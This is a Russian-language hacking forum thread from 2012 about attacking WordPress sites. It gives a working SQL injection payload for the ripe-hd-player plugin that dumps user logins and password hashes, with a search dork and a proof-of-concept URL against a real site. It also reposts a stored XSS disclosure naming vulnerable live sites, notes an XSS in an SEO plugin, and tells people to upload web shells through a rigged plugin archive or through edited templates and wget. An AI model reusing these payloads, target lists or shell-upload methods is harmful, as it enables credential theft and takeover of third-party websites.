ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
19.10.2012, 20:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
7946
Репутация:
5
|
|
# Exploit Title: ripe-hd-player SQL-Inj
# Date: 19.10.2012
# Exploit Author:ukrpunk
# Vendor Homepage: find by yourself
# Software Link: find by yourself
# Version: don't know
# Tested in: web
# Dork:inurl:"/plugins/ripe-hd-player"
# Exploit:-1+union+select+1,2,3,4,5,concat(user_login,0x3a,us er_pass),7,8,9,10,11,12,13,14,15,16,17+from+wp_use rs--
# PoC: http://www.fitness-bucuresti.ro/wp-content/plugins/ripe-hd-player/config.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,us er_pass),7,8,9,10,11,12,13,14,15,16,17+from+wp_use rs--
|
|
|
|
23.10.2012, 19:40
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
народ, кто в курсе как залить шелл в wp 3.4.2 ?
|
|
|
|
23.10.2012, 19:42
|
|
Guest
Сообщений: n/a
Провел на форуме:
42754
Репутация:
0
|
|
Сообщение от qaz
qaz said:
народ, кто в курсе как залить шелл в wp 3.4.2 ?
Через шаблоны.
|
|
|
|
25.10.2012, 01:18
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
0
|
|
Кто нибудь объяснит как раскрутить эту тему:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]###################################################################################
# Exploit Title: wordpress Count per Day Cross Site Scripting Vulnerability
#
# Google Dork:inurl:/wp-content/plugins/count-per-day
#
# Date: 08/24/2012
#
# Author: Crim3R
#
# Version 3.2.3
#
# Vendor Home : http://downloads.wordpress.org/plugin/count-per-day.3.2.3.zip
#
# Tested on: all
#
###################################################################################
[/COLOR][COLOR="#007700"]$
$[/COLOR][COLOR="#0000BB"]Author will be not responsible[/COLOR][COLOR="#007700"]for[/COLOR][COLOR="#0000BB"]any damage[/COLOR][COLOR="#007700"].
$
[/COLOR][COLOR="#FF8000"]###################################################################################
[/COLOR][COLOR="#007700"]========================================
[/COLOR][COLOR="#0000BB"]first notes[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php is not restricted to admin[/COLOR][COLOR="#007700"]and[/COLOR][COLOR="#0000BB"]anyone can access it directty by
browser[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]an attacker can add notes witch
can be html codes[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]its Stored Xss
[/COLOR][COLOR="#007700"]goto[/COLOR][COLOR="#0000BB"]WP[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]path[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]wp[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]content[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]plugins[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]count[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]per[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]day[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]notes[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php
in the notes section add html code[/COLOR][COLOR="#007700"]and[/COLOR][COLOR="#0000BB"]click Add
D3M0[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.christinedesavino.com/blog/wp-content/plugins/count-per-day
[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.dhakadakshinghsc.com/wp-content/plugins/count-per-day/
[/COLOR][COLOR="#0000BB"]www[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]watansport[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]net[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]ara[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]wp[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]content[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]plugins[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]count[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]per[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]day[/COLOR][COLOR="#007700"]/
===============[/COLOR][COLOR="#0000BB"]Crim3R[/COLOR][COLOR="#007700"]@[/COLOR][COLOR="#0000BB"]Att[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]Net[/COLOR][COLOR="#007700"]===========
[/COLOR][COLOR="#0000BB"]$home[/COLOR][COLOR="#007700"]= %[/COLOR][COLOR="#0000BB"]00
thanks to[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]2MzRp[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]Mikili[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]0x0ptim0us[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]iC0d3R[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]farbodmahini[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]Amir
[/COLOR][/COLOR]
|
|
|
|
25.10.2012, 01:46
|
|
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме:
168709
Репутация:
1
|
|
Сообщение от None
народ, кто в курсе как залить шелл в wp 3.4.2 ?
Через плагины)
|
|
|
25.10.2012, 19:21
|
|
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме:
168709
Репутация:
1
|
|
|
|
|
|
28.10.2012, 21:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
74477
Репутация:
21
|
|
подскажите exploit под WordPress 3.4.2
|
|
|
|
28.10.2012, 22:59
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
WordPress "All-in-One-SEO-Pack V 1.6.15.2" component ActiveXSS
Уязвим параметр $_POST['aiosp_menulabel']
Эксплyатация:
В админ панели при заполнение полей, поле
Меню метки: передаем
Сообщение от None
alert("5")
"inurl:/plugins/all-in-one-seo-pack/"
Уязвимый код:
Намеренно пока не выкладываю
P.S:Чуcтвую запах sql-injection.
Сайт разработчика: _ht_p://sempe[antisearch]rplugins.com/
P.S: надеюсь не боян, нашел сегодня на последней фри-версии!
|
|
|
|
07.11.2012, 18:42
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от z0mbyak
z0mbyak said:
Через плагины)
Сообщение от Ups
Ups said:
Через шаблоны.
а можно хоть прмер или где про ето почитать?
|
|
|
|
08.11.2012, 01:26
|
|
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме:
168709
Репутация:
1
|
|
Сообщение от None
а можно хоть прмер или где про ето почитать?
Скачай любой плагин для вп и закинь в архив свой шелл...
Сообщение от None
Через шаблоны.
Через редактирование шаблонов измени шаб и залейся через wget например...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
